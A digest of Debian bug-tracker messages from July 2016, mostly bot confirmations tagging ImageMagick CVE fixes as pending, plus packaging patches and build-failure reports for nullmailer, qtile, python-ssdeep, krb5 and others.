Bug #832793 [imagemagick] Fix a SIGABRT in pdb file handling
Added tag(s) pending.
> tags 833099 + pending
Bug #833099 [src:imagemagick] CVE-2016-6491 buffer overflow
Added tag(s) pending.
> tags 827643 + pending
Bug #827643 [imagemagick] imagemagick: writing to rgf format aborts
Added tag(s) pending.
> tags 833043 + pending
Bug #833043 [src:imagemagick] CVE-2016-5690
Added tag(s) pending.
> tags 832942 + pending
Bug #832942 [imagemagick] DDS file security fix
Added tag(s) pending.
> tags 832785 + pending
Bug #832785 [imagemagick] Fix an out of bound in generic decoder
Added tag(s) pending.
> tags 832789 + pending
Bug #832789 [imagemagick] Fix SEGV reported in profile handling
Added tag(s) pending.
> tags 832791 + pending
Bug #832791 [imagemagick] Fix an out of bound access in pdb file handling
Added tag(s) pending.
> tags 832888 + pending
Bug #832888 [imagemagick] CVE-2016-4564
Added tag(s) pending.
> tags 832787 + pending
Bug #832787 [imagemagick] Fix an out of bound in psd file
Added tag(s) pending.
> tags 833003 + pending
Bug #833003 [src:imagemagick] CVE-2016-5688 WPG file issue
Added tag(s) pending.
> tags 833044 + pending
Bug #833044 [src:imagemagick] CVE-2016-5691 DCM file bug lack of validation of 
pixel.red, pixel.green, and pixel.blue
Added tag(s) pending.
> tags 832887 + pending
Bug #832887 [imagemagick] CVE-2016-4563 The TraceStrokePolygon function in 
MagickCore/draw.c
Added tag(s) pending.
> tags 832885 + pending
Bug #832885 [imagemagick] CVE-2016-4562
Added tag(s) pending.
> tags 832890 + pending
Bug #832890 [src:imagemagick] CVE-2016-5687
Added tag(s) pending.
> tags 832968 + pending
Bug #832968 [src:imagemagick] CVE-2016-5010: tiff file Out-of-bounds read
Added tag(s) pending.
> tags 832944 + pending
Bug #832944 [imagemagick] Avoid a DOS for DDS file
Added tag(s) pending.
> tags 832780 + pending
Bug #832780 [imagemagick] Fix a wpg file out of bound
Added tag(s) pending.
> tags 833042 + pending
Bug #833042 [src:imagemagick] CVE-2016-5689 lack of required NULL pointer 
checks in the DCM parser
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
827643: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=827643
831034: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831034
832780: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832780
832785: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832785
832787: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832787
832789: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832789
832791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832791
832793: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832793
832885: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832885
832887: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832887
832888: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832888
832890: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832890
832942: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832942
832944: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832944
832968: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832968
833003: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833003
833042: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833042
833043: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833043
833044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833044
833099: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833099
833101: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833101
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832994: [debian-mysql] Bug#832994: libmariadbclient-dev-compat: fails to upgrade from 'testing' - trying to overwrite /usr/lib/x86_64-linux-gnu/libmysqlclient.so (from libmariadb-client-lgpl-dev-c

[Otto Kekäläinen]

Thanks for spotting this. It should be fixed in
https://anonscm.debian.org/gitweb/?p=pkg-mysql/mariadb-10.0.git;a=commitdiff;h=4c9104d2b40df4b8619b0a81cd346719d242a334

Processed: limit source to imagemagick, tagging 832633, tagging 832776, tagging 832506, tagging 832504 ...

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source imagemagick
Limiting to bugs with field 'source' containing at least one of 'imagemagick'
Limit currently set to 'source':'imagemagick'

> tags 832633 + pending
Bug #832633 [imagemagick] Fix a pbd file out of bound access
Added tag(s) pending.
> tags 832776 + pending
Bug #832776 [imagemagick] Fix handling of psd file
Added tag(s) pending.
> tags 832506 + pending
Bug #832506 [imagemagick] Fix out of bound in quantum handling
Added tag(s) pending.
> tags 832504 + pending
Bug #832504 [imagemagick] Fix an out of bound in xcf file handling
Added tag(s) pending.
> tags 832483 + pending
Bug #832483 [imagemagick] Fix out of bound for viff file
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
832483: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832483
832504: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832504
832506: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832506
832633: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832633
832776: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832776
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: limit source to imagemagick, tagging 832475, tagging 832482, tagging 832478, tagging 832474 ...

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source imagemagick
Limiting to bugs with field 'source' containing at least one of 'imagemagick'
Limit currently set to 'source':'imagemagick'

> tags 832475 + pending
Bug #832475 [imagemagick] Fix a outofbound access for psd file
Added tag(s) pending.
> tags 832482 + pending
Bug #832482 [imagemagick] WPG file security bug
Added tag(s) pending.
> tags 832478 + pending
Bug #832478 [imagemagick] Fix meta file outofbound access
Added tag(s) pending.
> tags 832474 + pending
Bug #832474 [imagemagick] Fix a heap buffer overflow in psd file handling
Added tag(s) pending.
> tags 832464 + pending
Bug #832464 [imagemagick] SUN file handling
Added tag(s) pending.
> tags 832480 + pending
Bug #832480 [imagemagick] Fix head buffer overflow in psd file
Added tag(s) pending.
> tags 832469 + pending
Bug #832469 [imagemagick] HDR file overflow
Added tag(s) pending.
> tags 832465 + pending
Bug #832465 [imagemagick] SUN file ABRT signal
Added tag(s) pending.
> tags 832467 + pending
Bug #832467 [imagemagick] Fix multiple out of bound problem
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
832464: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832464
832465: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832465
832467: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832467
832469: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832469
832474: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832474
832475: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832475
832478: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832478
832480: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832480
832482: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832482
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: limit source to imagemagick, tagging 832461, tagging 832455, tagging 832457, tagging 823750

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source imagemagick
Limiting to bugs with field 'source' containing at least one of 'imagemagick'
Limit currently set to 'source':'imagemagick'

> tags 832461 + pending
Bug #832461 [imagemagick] Fixed check for the number of pixels that will be 
allocated.
Added tag(s) pending.
> tags 832455 + pending
Bug #832455 [imagemagick] Fix a off-by-one error leading to segfault
Added tag(s) pending.
> tags 832457 + pending
Bug #832457 [imagemagick] Fix psd file handling
Added tag(s) pending.
> tags 823750 + pending
Bug #823750 [imagemagick] [imagemagick]  Multiple security problems
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
823750: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823750
832455: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832455
832457: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832457
832461: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832461
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#831813: nullmailer: diff for NMU version 1:1.13-1.2

[zeha]

Control: tags 831813 + patch
Control: tags 831813 + pending

Dear maintainer,

I've prepared an NMU for nullmailer (versioned as 1:1.13-1.2) and
uploaded it to DELAYED/5. Please feel free to tell me if I
should delay it longer.

Cheers,
Christian


diff -Nru nullmailer-1.13/debian/changelog nullmailer-1.13/debian/changelog
--- nullmailer-1.13/debian/changelog2016-07-12 23:15:52.0 +
+++ nullmailer-1.13/debian/changelog2016-07-31 21:00:29.0 +
@@ -1,3 +1,11 @@
+nullmailer (1:1.13-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Do not keep relayhost data in debconf database longer than
+strictly needed. (Closes: #831813)
+
+ -- Christian Hofstaedtler   Sun, 31 Jul 2016 20:57:13 +
+
 nullmailer (1:1.13-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff -Nru nullmailer-1.13/debian/postinst nullmailer-1.13/debian/postinst
--- nullmailer-1.13/debian/postinst 2012-08-21 08:07:21.0 +
+++ nullmailer-1.13/debian/postinst 2016-07-31 20:57:10.0 +
@@ -37,6 +37,8 @@
 -e 's/[[:space:]]*:[[:space:]]*/\n/g' \
 -e ':b s/(\[[^]=]*)=/\1:/; tb' \
 -e 's/[][]//g' > /etc/nullmailer/remotes
+   # zap debconf entry, as this key may contain sensitive data.
+   db_set nullmailer/relayhost ""
 
db_get nullmailer/adminaddr
if [ "$RET" ]; then

Processed: nullmailer: diff for NMU version 1:1.13-1.2

[Debian Bug Tracking System]

Processing control commands:

> tags 831813 + patch
Bug #831813 [nullmailer] nullmailer leaks sensitive data through debconf
Added tag(s) patch.
> tags 831813 + pending
Bug #831813 [nullmailer] nullmailer leaks sensitive data through debconf
Added tag(s) pending.

-- 
831813: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831813
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#823030: marked as done (Breaks old software (please, provide libopensc2 and opensc))

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 16:56:28 -0400
with message-id <20160731205628.GX23692@gambit>
and subject line Re: [pkg-opensc-maint] Bug#823030:  Bug#823030: Status
has caused the Debian Bug report #823030,
regarding Breaks old software (please, provide libopensc2 and opensc)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
823030: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823030
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: opensc-pkcs11
Version: 0.16.0~rc1-1
Severity: critical

Old software that depends from opensc and libopensc2 no longer works
with opensc-pkcs11 because it depends on those packages and the new
package replaces those previous two packages. If it is backwards
compatible, please provide the old packages. If it is not backwards
compatible please close this report.

Thank you so much in advance.
--- End Message ---
--- Begin Message ---
* José Luis González (jlgon...@ya.com) wrote:
> On Sat, 30 Jul 2016 15:32:55 -0400
> Eric Dorland  wrote:
> 
> > * José Luis González (jlgon...@ya.com) wrote:
> > > On Sat, 30 Jul 2016 01:53:17 -0400
> > > Eric Dorland  wrote:
> > > 
> > > > Control: tags -1 moreinfo
> > > > 
> > > > What software is breaking exactly? You should not need libopensc2, it
> > > > was always an internal library.
> > > 
> > > It's an external package, from Spain's ID card electronic signing
> > > system. As far as I remember it depended on those packages.
> > > 
> > > I managed to install the external packages with packages from stable.
> > 
> > Is it actually linking against libopensc2?
> 
> Hi,
> 
> I just found out the conflicting package wasn't installed on my system
> as it depended on a release previous to Wheezy. Actually I'm not sure
> this particular package is needed anymore since the Spanish police
> hasn't provided packages for newer Debian versions for a very long
> time. However the other package (which doesn't require libopensc2 and
> installs correctly with stable repositories) seems not to work OK with
> my ID card, although I can't tell what's the reason for this. Since the
> packages requiring libopensc2 and old opensc are probably not necessary
> I think you can close this report. I will try to find out why the ID
> card is not working on my system and if it's related to Debian opensc I
> would reopen this or open a new report as appropriate.
> 
> Thank you so much for your understanding and assistance.

No problem, let me know if I can help.

-- 
Eric Dorland 
43CF 1228 F726 FD5B 474C  E962 C256 FBD5 0022 1E93--- End Message ---

Processed: Re: [Pkg-gmagick-im-team] Bug#827643: other bug reports

[Debian Bug Tracking System]

Processing control commands:

> tags -1 + security
Bug #827643 [imagemagick] imagemagick: writing to rgf format aborts
Added tag(s) security.
> severity -1 serious
Bug #827643 [imagemagick] imagemagick: writing to rgf format aborts
Severity set to 'serious' from 'normal'

-- 
827643: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=827643
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#833101: DOS by not releasing memory

[Bastien ROUCARIES]

Package: src:imagemagick
Version: 8:6.7.7.10-5
Severity: grave
Tags: patch security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org

Imagemagick version prior of february 2016 does not correctly release memory

There is a resource leak in AcquireVirtualMemory resulting in major
performance degradation whenever AcquireMagickResource starts
returning false. The problem is that AcquireMagickResource calls are
not paired with calls to RelinquishMagickResource if a resource limit
is hit.

Eventually all allocations and pixel caches will start using
file-backed storage leading to major performance degradations.

Another issue is that AcquireVirtualMemory does not remove temporary
files created for failed file-backed memory mappings. This has been
adressed in IM 7.

Fixed by 4e81ce8b07219c69a9aeccb0f7f7b927ca6db74c

Bastien

Processed: found 833099 in 8:6.7.7.10-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> # mark common anchestor as affected
> found 833099 8:6.7.7.10-4
Bug #833099 [src:imagemagick] CVE-2016-6491 buffer overflow
Marked as found in versions imagemagick/8:6.7.7.10-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833099: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833099
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#833099: CVE-2016-6491 buffer overflow

[Bastien ROUCARIES]

Package: src:imagemagick
Version: 8:6.7.7.10-5
Severity: grave
Tags: patch security
X-Debbugs-CC: secure-testing-t...@lists.alioth.debian.org


https://github.com/ImageMagick/ImageMagick/commit/dd84447b63a71fa8c3f47071b09454efc667767b

Bug#831034: imagemagick: CVE-2016-5841 CVE-2016-5842

[Bastien ROUCARIES]

commit 3b7c0268e5339014f28abd620f4395827abc7ef4
Author: Cristy 
Date:   Tue Jun 21 21:13:18 2016 -0400

Improve checking of EXIF profile to prevent integer overflow

This fix CVE-2016-5841 and CVE-2016-5842

bug-debian: https://bug.debian.org/CVE-2016-5842
origin: upstream,
https://github.com/ImageMagick/ImageMagick/commit/d8ab7f046587f2e9f734b687ba7e6e10147c294b

commit faa64c1ec03fa1aa7ca468ae50c9f8281e6c4b3f
Author: Cristy 
Date:   Fri May 13 07:56:18 2016 -0400

Rewrite property with new wrapper

This fix https://github.com/ImageMagick/ImageMagick/issues/198

And it is also needed to apply cleanly CVE-2016-5841 that use
signed/unsigned logic.

Origin:upstream, 08fe978d2de086b90b67631b4d1097becc98f1d5

On Wed, Jul 13, 2016 at 9:53 PM, Salvatore Bonaccorso  wrote:
> Source: imagemagick
> Version: 8:6.8.9.9-7.2
> Severity: grave
> Tags: security upstream
> Justification: user security hole
>
> the following vulnerabilities were published for imagemagick.
> CVE-2016-5841[0] and CVE-2016-5842[1].
>
> If you fix the vulnerabilities please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) ids in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2016-5841
> [1] https://security-tracker.debian.org/tracker/CVE-2016-5842
> [2] http://www.openwall.com/lists/oss-security/2016/06/23/1
>
> Please adjust the affected versions in the BTS as needed.
>
> Regards,
> Salvatore
>

Bug#833098: python3-qtile: Python3 library depends on Python 2 packages

[Stefano Rivera]

Package: python3-qtile
Version: 0.10.6-2
Severity: serious
Tags: patch
Justification: Policy 7.2

Spot the problem:

Package: python3-qtile
Depends: python-cffi (>= 1.3.0), python-xcffib (>= 0.4.0), python-cairocffi (>= 
0.7), libglib2.0-0, libpango1.0-0, libpangocairo-1.0-0, python3-trollius, 
python3-cairocffi, python3-cffi-backend-api-min (<= 9729), 
python3-cffi-backend-api-max (>= 9729), python3-six (>= 1.4.1), python3-xcffib, 
python3:any (>= 3.3.2-2~)

A python3 library requiring python2 modules? o_O

SR
diff -Nru qtile-0.10.6/debian/changelog qtile-0.10.6/debian/changelog
--- qtile-0.10.6/debian/changelog	2016-05-29 09:31:59.0 -0400
+++ qtile-0.10.6/debian/changelog	2016-07-31 15:27:55.0 -0400
@@ -1,3 +1,10 @@
+qtile (0.10.6-2.1) UNRELEASED; urgency=medium
+
+  * Non-maintainer upload.
+  * Less crazy dependencies
+
+ -- Stefano Rivera   Sun, 31 Jul 2016 15:27:48 -0400
+
 qtile (0.10.6-2) unstable; urgency=medium
 
   * Added postinst and prerm scripts for qtile:
diff -Nru qtile-0.10.6/debian/control qtile-0.10.6/debian/control
--- qtile-0.10.6/debian/control	2016-05-29 09:30:58.0 -0400
+++ qtile-0.10.6/debian/control	2016-07-31 15:23:20.0 -0400
@@ -65,9 +65,9 @@
 
 Package: python3-qtile
 Architecture: any
-Depends: python-cffi (>= 1.3.0),
- python-xcffib (>= 0.4.0),
- python-cairocffi (>= 0.7),
+Depends: python3-cffi (>= 1.3.0),
+ python3-xcffib (>= 0.4.0),
+ python3-cairocffi (>= 0.7),
  libglib2.0-0,
  libpango1.0-0,
  libpangocairo-1.0-0,

Bug#831244: ruby-eventmachine: FTBFS: Build hangs minutes of inactivity

[Christian Hofstaedtler]

* Lucas Nussbaum  [160731 20:17]:
> During a rebuild of all packages in sid, your package failed to build on
> amd64.

So I tried debugging this a bit; for me the 'TestFileWatch' test
hangs, both with our 1.0.7-3 and also if I update that to 1.2.0.1.

Now from what I see the test uses inotify; if our test builds use
overlayfs, maybe that just does not support inotify (properly).

-- 
 ,''`.  Christian Hofstaedtler 
: :' :  Debian Developer
`. `'   7D1A CFFA D9E0 806C 9C4C  D392 5C13 D6DB 9305 2E03
  `-

Processed: tagging 831244

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 831244 + confirmed
Bug #831244 [src:ruby-eventmachine] ruby-eventmachine: FTBFS: Build hangs 
minutes of inactivity
Added tag(s) confirmed.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
831244: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831244
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 833044 in 8:6.7.7.10-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> # mark common anchestor as affected
> found 833044 8:6.7.7.10-4
Bug #833044 [src:imagemagick] CVE-2016-5691 DCM file bug lack of validation of 
pixel.red, pixel.green, and pixel.blue
Marked as found in versions imagemagick/8:6.7.7.10-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833044
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 833043 in 8:6.7.7.10-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> # mark common anchestor as affected
> found 833043 8:6.7.7.10-4
Bug #833043 [src:imagemagick] CVE-2016-5690
Marked as found in versions imagemagick/8:6.7.7.10-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833043: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833043
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: found 833042 in 8:6.7.7.10-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> # mark common anchestor as affected
> found 833042 8:6.7.7.10-4
Bug #833042 [src:imagemagick] CVE-2016-5689 lack of required NULL pointer 
checks in the DCM parser
Marked as found in versions imagemagick/8:6.7.7.10-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833042: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833042
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#828946: marked as done (krb5: FTBFS in testing (LaTeX Error: File `iftex.sty' not found))

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 19:34:08 +
with message-id 
and subject line Bug#828946: fixed in krb5 1.14.3+dfsg-1
has caused the Debian Bug report #828946,
regarding krb5: FTBFS in testing (LaTeX Error: File `iftex.sty' not found)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
828946: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=828946
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:krb5
Version: 1.14.2+dfsg-1
User: reproducible-bui...@lists.alioth.debian.org
Usertags: ftbfs
Severity: serious

Dear maintainer:

This package currently fails to build in stretch:


[...]
sphinx-build  -t pathsubs -b latex -q rst_composite pdf_subst
mv pdf_subst/Makefile pdf_subst/GMakefile
(cd pdf_subst && \
 for i in admin appdev basic build plugindev user; do \
texfile=`echo ${i}.tex` && \
idxfile=`echo ${i}.idx` && \
pdflatex  $texfile && \
pdflatex  $texfile && \
makeindex -s python.ist $idxfile || true; \
pdflatex  $texfile && \
pdflatex  $texfile; done && \
 rm -f *.dvi *.log *.ind *.aux *.toc *.syn *.idx *.out *.ilg *.pla \
)
This is pdfTeX, Version 3.14159265-2.6-1.40.17 (TeX Live 2016/Debian) 
(preloaded format=pdflatex)
 restricted \write18 enabled.
entering extended mode
(./admin.tex
LaTeX2e <2016/03/31> patch level 1
Babel <3.9r> and hyphenation patterns for 3 language(s) loaded.
(./sphinxmanual.cls
Document Class: sphinxmanual 2009/06/02 Document class (Sphinx manual)
(/usr/share/texlive/texmf-dist/tex/latex/base/report.cls
Document Class: report 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo)))

! LaTeX Error: File `iftex.sty' not found.


A full build log is available here:

https://tests.reproducible-builds.org/debian/rbuild/testing/amd64/krb5_1.14.2+dfsg-1.rbuild.log

Thanks.
--- End Message ---
--- Begin Message ---
Source: krb5
Source-Version: 1.14.3+dfsg-1

We believe that the bug you reported is fixed in the latest version of
krb5, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 828...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Benjamin Kaduk  (supplier of updated krb5 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sat, 30 Jul 2016 22:42:39 -0400
Source: krb5
Binary: krb5-user krb5-kdc krb5-kdc-ldap krb5-admin-server krb5-kpropd 
krb5-multidev libkrb5-dev libkrb5-dbg krb5-pkinit krb5-otp krb5-k5tls krb5-doc 
libkrb5-3 libgssapi-krb5-2 libgssrpc4 libkadm5srv-mit10 libkadm5clnt-mit10 
libk5crypto3 libkdb5-8 libkrb5support0 libkrad0 krb5-gss-samples krb5-locales 
libkrad-dev
Architecture: source
Version: 1.14.3+dfsg-1
Distribution: unstable
Urgency: medium
Maintainer: Sam Hartman 
Changed-By: Benjamin Kaduk 
Description:
 krb5-admin-server - MIT Kerberos master server (kadmind)
 krb5-doc   - documentation for MIT Kerberos
 krb5-gss-samples - MIT Kerberos GSS Sample applications
 krb5-k5tls - TLS plugin for MIT Kerberos
 krb5-kdc   - MIT Kerberos key server (KDC)
 krb5-kdc-ldap - MIT Kerberos key server (KDC) LDAP plugin
 krb5-kpropd - MIT Kerberos key server (KDC)
 krb5-locales - internationalization support for MIT Kerberos
 krb5-multidev - development files for MIT Kerberos without Heimdal conflict
 krb5-otp   - OTP plugin for MIT Kerberos
 krb5-pkinit - PKINIT plugin for MIT Kerberos
 krb5-user  - basic programs to authenticate using MIT Kerberos
 libgssapi-krb5-2 - MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
 libgssrpc4 - MIT Kerberos runtime libraries - GSS enabled ONCRPC
 libk5crypto3 - MIT Kerberos runtime libraries - Crypto Library
 libkadm5clnt-mit10 - MIT Kerberos runtime libraries - Administration Clients
 libkadm5srv-mit10 - MIT Kerberos runtime libraries - KDC and Admin Server
 libkdb5-8  - MIT Kerberos runtime libraries - Kerberos database
 libkrad-dev - MIT Kerberos RADIUS 

Bug#833091: python-ssdeep: Missing dependency on python-cffi

[Stefano Rivera]

Package: python-ssdeep
Version: 3.1+dfsg-1+b2
Severity: serious
Tags: patch
Justification: Policy 7.2

python-ssdeep explicitly imports cffi (it's not using one of the
out-of-line modes), so it needs to explicitly depend on the python-cffi
binary package.

This could be avoided if upstream switched to one of the out of line
modes.

https://cffi.readthedocs.io/en/latest/overview.html#purely-for-performance-api-level-out-of-line

SR
diff -Nru python-ssdeep-3.1+dfsg/debian/changelog python-ssdeep-3.1+dfsg/debian/changelog
--- python-ssdeep-3.1+dfsg/debian/changelog	2014-10-24 14:50:23.0 -0400
+++ python-ssdeep-3.1+dfsg/debian/changelog	2016-07-31 15:14:14.0 -0400
@@ -1,3 +1,10 @@
+python-ssdeep (3.1+dfsg-1.1) UNRELEASED; urgency=medium
+
+  * Non-maintainer upload.
+  * Depend on python-cffi
+
+ -- Stefano Rivera   Sun, 31 Jul 2016 15:14:07 -0400
+
 python-ssdeep (3.1+dfsg-1) unstable; urgency=low
 
   * Repack to remove non-free sources.
diff -Nru python-ssdeep-3.1+dfsg/debian/control python-ssdeep-3.1+dfsg/debian/control
--- python-ssdeep-3.1+dfsg/debian/control	2014-10-24 14:23:53.0 -0400
+++ python-ssdeep-3.1+dfsg/debian/control	2016-07-31 15:13:57.0 -0400
@@ -18,7 +18,7 @@
 
 Package: python-ssdeep
 Architecture: any
-Depends: ${misc:Depends}, ${python:Depends}, ${shlibs:Depends}
+Depends: ${misc:Depends}, ${python:Depends}, ${shlibs:Depends}, python-cffi
 Description: Python 2.x wrapper for the ssdeep piecewise hashing tool
  This is a straightforward Python wrapper for ssdeep by Jesse Kornblum,
  which is a library for computing context triggered piecewise hashes (CTPH).
@@ -30,7 +30,7 @@
 
 Package: python3-ssdeep
 Architecture: any
-Depends: ${misc:Depends}, ${python3:Depends}, ${shlibs:Depends}
+Depends: ${misc:Depends}, ${python3:Depends}, ${shlibs:Depends}, python3-cffi
 Description: Python 3.x wrapper for the ssdeep piecewise hashing tool
  This is a straightforward Python wrapper for ssdeep by Jesse Kornblum,
  which is a library for computing context triggered piecewise hashes (CTPH).

Processed: reassign to zzzeeksphinx

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> reassign 829020 zzzeeksphinx 1.0.18-1
Bug #829020 [src:sqlalchemy] sqlalchemy: FTBFS in testing (too many values to 
unpack)
Bug reassigned from package 'src:sqlalchemy' to 'zzzeeksphinx'.
No longer marked as found in versions sqlalchemy/1.0.13+ds1-1.
Ignoring request to alter fixed versions of bug #829020 to the same values 
previously set
Bug #829020 [zzzeeksphinx] sqlalchemy: FTBFS in testing (too many values to 
unpack)
There is no source info for the package 'zzzeeksphinx' at version '1.0.18-1' 
with architecture ''
Unable to make a source version for version '1.0.18-1'
Marked as found in versions 1.0.18-1.
> reassign 830178 zzzeeksphinx 1.0.18-1
Bug #830178 [src:mako] mako: FTBFS: ValueError: too many values to unpack
Bug reassigned from package 'src:mako' to 'zzzeeksphinx'.
No longer marked as found in versions mako/1.0.4+ds1-1.
Ignoring request to alter fixed versions of bug #830178 to the same values 
previously set
Bug #830178 [zzzeeksphinx] mako: FTBFS: ValueError: too many values to unpack
There is no source info for the package 'zzzeeksphinx' at version '1.0.18-1' 
with architecture ''
Unable to make a source version for version '1.0.18-1'
Marked as found in versions 1.0.18-1.
> merge 829020 830178
Bug #829020 [zzzeeksphinx] sqlalchemy: FTBFS in testing (too many values to 
unpack)
Bug #830178 [zzzeeksphinx] mako: FTBFS: ValueError: too many values to unpack
Merged 829020 830178
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
829020: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829020
830178: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830178
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832291: marked as done (bogofilter-{bdb, sqlite, tokyocabinet}: copyright file missing after upgrade (policy 12.5))

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 18:33:48 +
with message-id 
and subject line Bug#832291: fixed in bogofilter 1.2.4+dfsg1-7
has caused the Debian Bug report #832291,
regarding bogofilter-{bdb, sqlite, tokyocabinet}: copyright file missing after 
upgrade (policy 12.5)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
832291: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832291
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
